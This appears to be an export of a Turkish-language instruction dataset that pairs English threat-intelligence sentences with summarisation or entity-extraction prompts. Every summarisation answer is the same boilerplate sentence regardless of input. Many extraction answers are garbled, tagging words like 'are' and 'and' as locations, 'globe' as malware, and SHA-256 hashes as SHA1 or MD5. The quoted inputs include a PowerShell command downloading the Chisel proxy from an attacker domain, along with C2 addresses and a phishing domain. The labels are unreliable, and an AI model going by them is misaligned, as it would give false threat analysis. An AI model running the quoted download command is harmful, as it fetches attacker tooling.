instruction
stringclasses
2 values
input
stringlengths
3
5.01k
output
stringlengths
10
5.79k
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
If you haven’t been using it, consider using that feature.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
On episode four of #TrendTalksBizSec.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Take time to ensure you have a good, complex, unguessable password.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
An initial investigation into the DDoS attacks suggested that Mirai and Meris bot networks may have been leveraged in the attacks.
malware: Meris bot networks; attack-pattern: DDoS attacks; malware: Mirai
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
This allows the malware to indirectly execute a command within the cmd.exe process.
malware: cmd.exe
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In the threat actor toolkit, different types of attacks are used for different purposes: Phishing campaigns can be used like a scalpel—targeting specific groups or individuals with personalized lures that are more likely to trick them into taking action (like clicking on a malware link), while DDoS attacks are more like a hatchet—disrupting or blocking a site or a service entirely.
location: are; attack-pattern: Phishing; location: can; location: are; location: likely; location: them; location: action; location: are
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
GET http://{C2}/Index.php?Ck=OK HTTP/1.1
URL: http://{C2}/Index.php?Ck
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Whoever controls the key controls updates for the application forever, and a key shared between applications in this way can never be transferred to a financial institution without compromising the security of all of the other apps signed with it.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
This is used to download reverse proxy Chisel via PowerShell: c:\windows\system32\windowspowershell\v1.0\powershell.exe -command "$(new-object System.Net.WebClient).DownloadFile('https[:]//webadmin[.]mirrorstorage[.]org/ch.exe', 'ch.exe')"
malware: Chisel; tools: PowerShell; FILEPATH: c:\windows\system32\windowspowershell\v1.0\powershell.exe; URL: https[:]//webadmin[.]mirrorstorage[.]org/ch.exe; FILEPATH: ch.exe
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In the mid-2000s, criminals made great profits from using Banking Trojans to steal credentials for online banking websites, and subsequently draining the accounts’ associated funds.
TIME: mid-2000s; attack-pattern: steal credentials
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This time, it expects an encrypted packet to be decrypted using the hard-coded RSA-2560 public key.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Hear from innovators and experts, gain real-world skills through hands-on sessions and interactive workshops, and find out how breach prevention is changing the security industry.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The many similarities and connections show that threat actors do not work in isolation, and that attacks do not necessarily appear from out of nowhere.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
myshell.jsp
FILEPATH: myshell.jsp
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The other piece is included separately in the assets directory in APK files, and will be invoked by Java reflection in runtime (Figure 7).
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We terminated 2 YouTube channels as part of our investigation into coordinated influence operations linked to Moldova.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
More specifically, this flaw exists since the default user for these VMware products, horizon, has access to several sudo commands, some of which involve paths that can be overwritten as well.
identity: VMware; SOFTWARE: horizon
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The Patchwork Link Patchwork also uses the Delphi file stealer as a similarity with Urpage, which suggests the three groups are somehow related.
threat-actor: Patchwork; threat-actor: Patchwork; threat-actor: Urpage
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Spear phishing sample in fluent Japanese
attack-pattern: Spear phishing; location: sample
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
No matter how well patched your systems are, there’s no reason not to deploy IPS signatures like these to detect and block attempted Heartbleed exploits.
vulnerability: Heartbleed
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 2. Revix encrypting a QNAP NAS device Figure 3.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Moyer is accused of offering 200 iPads to the Santa County Sheriff's office in exchange for concealed carry permits for four Apple employees.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
flash.exe BIOPASS RAT Loader
malware: BIOPASS RAT; FILEPATH: flash.exe
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
X-Mailer: ZuckMail [version 1.00]
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Rather than simply using a theme or lure that is relevant to the target, the attackers behind these attacks use an email conversation that’s in progress to carry out their attack.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
So basically you have two choices:
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This build command line has a function to update the final binary versions based on the last Git-tagged version.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Using AutoFocus to quickly search and correlate artifacts across the collective set of WildFire and other Palo Alto Networks threat intelligence, we were able to associate the attacks with the group publicly known as “DragonOK.”
malware: WildFire; threat-actor: DragonOK; SOFTWARE: AutoFocus; identity: Palo Alto Networks
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The apps mainly used Middle East-based news and sociopolitical themes as social engineering hooks and abused social media to further proliferate.
attack-pattern: social engineering; attack-pattern: abused social media
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We haven’t retrieved a copy of the exploit.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
OceanLotus commands and descriptions
malware: OceanLotus; location: and
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The YouTube account has no public videos, but we observed this threat actor sharing unlisted links in various hacking forums.
SOFTWARE: YouTube
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
These are the things that I think countries across the globe need to understand, especially here in Western countries, and especially NATO countries, understanding that they need to be shoring up, and almost like DHS says in their program, Shields Up, is really focused on being proactive and protecting those critical sectors.
location: are; malware: globe; location: Western; location: and; location: and; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
In one example, attackers impersonated McAfee.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The evidence is that Waterbear frequently uses internal IPs as its own C&C servers (for instance, b9f3a3b9452a396c3ba0ce4a644dd2b7f494905e820e7b1c6dca2fdcce069361 uses an internal IP address of 10[.]0[.]0[.]211 as its C&C server).
SHA2: b9f3a3b9452a396c3ba0ce4a644dd2b7f494905e820e7b1c6dca2fdcce069361; IPV4: 10[.]0[.]0[.]211
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Indicators of Compromise (IoCs) SHA-256 Package name Label 0c4b08bec1251b1ebc715a7ef1a712cdcb4d37ce0093d88f7fa73b0e05bf7b0e com.sas.gplayservices.accesibility GSERVICES 38acf26161a2c6429ee40d9b70d8419a9bd00eaa8740d221f943cea3229372dd com.sas.gservices.accesibility GSERVICES 3bf85d0aff5ddc0c57e43b879631ee692d98d01f5c964336471f1cdfe0d291f8 com.example.rat rat 7cb0eb93de496e2141b6e0541465ca71a84063867381085692885c75aa59cb1b com.pdf.searcher.dd Pdf Searcher 8ad18bd8f5d2f1fd9e00211170e8a540ddf7f51618588fab31b4ddd2b34b75e1 com.pdfd.researcher.resaq_ver1 Caller c8e1a702a27309c22728792c64aad4abc14ec2bfad1b30a4f27b8ebc6bcc68ff com.sas.gservices.accesibility GSERVICES C&C servers 3.95.71.123:3000 18.206.105.66:3000 40.114.109.69:3000 52.21.5.241:2000 Phishing domain http://gooogle[.]press/ MITRE ATT&CK Techniques Tactic Technique ID Description Initial Access Masquerade as Legitimate Application T1444 Used to masquerade as a legitimate chat app Persistence Abuse Device Administrator Access to Prevent Removal T1401
SHA1: 0c4b08bec1251b1ebc715a7ef1a712cdcb4d37ce0093d88f7fa73b0e05bf7b0e; SHA1: 38acf26161a2c6429ee40d9b70d8419a9bd00eaa8740d221f943cea3229372dd; SHA2: 3bf85d0aff5ddc0c57e43b879631ee692d98d01f5c964336471f1cdfe0d291f8; SHA2: 7cb0eb93de496e2141b6e0541465ca71a84063867381085692885c75aa59cb1b; SHA1: 8ad18bd8f5d2f1fd9e00211170e8a540ddf7f51618588fab31b4ddd2b34b75e1; MD5: c8e1a702a27309c22728792c64aad4abc14ec2bfad1b30a4f27b8ebc6bcc68ff; attack-pattern: Phishing; URL: http://gooogle[.]press/; location: chat; attack-pattern: Abuse Device Administrator Access to Prevent Removal
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The following file extensions are overwritten with a one-byte value of 0xCC.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
A convincing Yahoo phishing email Clicking on the “Try McAfee Email Protection” button would lead to this legitimate website:
attack-pattern: phishing; identity: McAfee; location: Protection; threat-actor: lead
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Joining me again is my cohort in crime.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
from an Asus RT-AC68U router
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Connect with “hxxp:// kristom[.]hopto[.]org /{computer name}_{hexadecimal volume serious number}/help_05_03[.]php” (MITRE ATT&CK framework IDs T1043, T1071, T1082)
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This means that web users can get a class object remotely by simply submitting a URL as shown in Figure 4.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
2. Receiving student discounts or coupons from retailers:
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The HelloXD author(s) did modify the infamous file marker and mutex however, opting for dxunmgqehhehyrhtxywuhwrvzxqrcblo as the file marker and With best wishes And good intentions… as the mutex (Figure 9).
malware: HelloXD
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
.docx Figure 3. Exploitation of DDEAUTO Figure 4.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We terminated 6 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Iran.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
As that trend shows no sign of slowing down anytime soon, we can expect this to remain a very lucrative avenue for attackers.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Below is a table for comparison.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Operating system language version
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The injected executable contains the last stage of the TDrop2 malware variant.
malware: TDrop2
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
One messy reality is that enterprises don’t manage all their endpoints.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We received leads from the FBI that supported us in this investigation.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
However, this malicious seller activity may also reveal a larger scale problem within university systems.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
A more detailed analysis of the Command-and-Control communication flow of ANEL can be found in this technical brief.
malware: ANEL
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Because these vulnerabilities affect the processors at the physical layer, the only way for the vulnerabilities to be fully addressed is for the processors to be replaced or to have a firmware update.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Figure 7. PowerShell scripts downloading JPG files The following TTPs are common in both campaigns related to the scripts in Figure 7:
tools: PowerShell
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
However, we were able to match some code reuse in one of the espionage backdoor’s functionalities.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
ServiceManage - Lists all of the services in the compromised host.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 4 shows the leaked path.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
As mentioned, the template contains malicious macro (MITRE ATT&CK framework ID T1064), which exports VBS (MITRE ATT&CK framework ID T1064) to execute itself.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
If the C&C server receives the request with the special cookie value, it can verify that the request comes from its client applications.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Once files are identified, PClock will begin encrypting them, one-by-one.
malware: PClock
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Figure 14. CrimsonRAT malware hosted in viral91[.]xyz We were also able to source a phishing document, “csd_car_price_list_2017,” that is related to this domain and has been seen in the wild in 2017.
attack-pattern: source; attack-pattern: phishing; location: and
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Figure 13. Copying tools and other malicious components to the compromised machine using AnyDesk
tools: AnyDesk
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The main concept of an isolated heap is simple.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Any one government’s ability to meaningfully impact this market is limited; only through a concerted international effort can this serious risk to online safety be mitigated.
location: impact; location: market; location: only; location: international; location: effort; location: can; tools: safety
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Some portions of the system are protected by credentials.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
If the cookies failed to provide access to the account, a login page is displayed and the attacker can manually enter credentials to proceed, as the program will wait until it finds the inbox page.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Beginning in June 2017, phishing sites were set up mimicking the ADFS (Active Directory Federation Services) of the U.S. Senate.
attack-pattern: phishing; location: sites
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We’ve updated and added signatures to the WildFire analysis and Cortex XDR Prevent and Pro products to block newly discovered vulnerabilities and malware including HermeticWiper.
SOFTWARE: WildFire; malware: HermeticWiper; SOFTWARE: Cortex XDR Prevent and Pro
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We are aware of the following information about how the Petya attack lifecycle works.
malware: Petya
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The email that used the coronavirus-related subject came with an attached document file.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The vulnerability can be leveraged to run commands as a root user on a vulnerable instance.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Anti-VM checks in sample c47fabc47806961f908bed37d6b1bbbfd183d564a2d01b7cae87bd95c20ff8a5 Figure 7.
SHA2: c47fabc47806961f908bed37d6b1bbbfd183d564a2d01b7cae87bd95c20ff8a5
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This group aims to coordinate a "whole-of-government" response to the above-mentioned cyber incident.?
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
At the time of writing, there are two known samples identified as WhisperGate: Stage1.exe and Stage2.exe.
malware: WhisperGate; FILEPATH: Stage1.exe; FILEPATH: Stage2.exe
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 5. Malicious script appended on the victim’s email signature Figure 6.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Thanks Ed.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Timing In our most recent research, one of the things that jumped out for our researchers is the clear pattern around the timing of the attacks.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
x.TextContent.StartsWith("Access for less secure apps has been turned on") select x).ToList
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Conclusions
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We were able to uncover multiple additional samples exploiting the same technique as well as an additional Google Code account with multiple projects containing encoded commands.
tools: uncover; location: same
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Unit 42 believes that x4k, this threat actor, is now expanding into the ransomware business to capitalize on some of the gains other ransomware groups are making.
identity: Unit 42; threat-actor: x4k
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Figure 2. Korean language (left), simplified Chinese language (right) Microsoft Office instructions on how to enable macro Figure 3.
tools: Office
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Finally, the script will print out the client ID and the decryption key that allows the malicious actors to decrypt the stolen database files of the chat history.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 8: decrease the reference number, not yet freed
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 1: Bogus patch installer overlying malware requesting administrative permissions
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In addition to storing variables, Bash allows for storing shell functions in variables that users can call later.
SOFTWARE: Bash
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
However, since threat actors tend to cover their tracks quickly, by the time the security analyst is reviewing the incident, there is a chance that critical information may have been permanently deleted and is no longer readily accessible. Instead of depending on a security analyst to review a credential dumping event and manually collecting artifacts for their investigation, Trend Micro wanted to automate the collection of this evidence as quickly as possible when a detection occurs.
location: time; location: security; location: chance; location: may; location: and; location: security; attack-pattern: credential dumping; location: and
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Open source malware like Sorano and AdamantiumThief were also observed.
attack-pattern: source; location: and
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The vast majority of these messages were sent to spam without any user ever seeing them, and we were able to preemptively block the domains using Safe Browsing.
tools: vast; location: ever; location: them; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
It goes without saying that you should keep a close eye on your card statements/bank account at all times – watching out even for small amounts that hackers may be making to test if your card is still active.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Updated as of February 6, 2017, 10:05 PM (UTC-7): We updated to include observed systems from other countries that connected to IP addresses operated by Lurk.
TIME: 10:05 PM (UTC-7):
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
It was last updated on May 27, 2020.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We believe this is a technique the attacker is using to evade detection rules.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
On Saturday, Microsoft disclosed a critical vulnerability in Internet Explorer, CVE-2014-1776, affecting Internet Explorer versions 6 through 11.
TIME: Saturday; identity: Microsoft; vulnerability: CVE-2014-1776; SOFTWARE: Internet Explorer versions 6; SOFTWARE: Internet Explorer
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Our analysis revealed that they drop a new backdoor, which is written in PowerShell as MuddyWater’s known POWERSTATS backdoor.
attack-pattern: PowerShell; malware: POWERSTATS
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
All of the domains currently resolve to 151.248.115.146, a Russian IP address and have WhoIs records associated with the e-mail address “ladomfichisi1987@mail.ru”.
IPV4: 151.248.115.146; location: Russian; EMAIL: ladomfichisi1987@mail.ru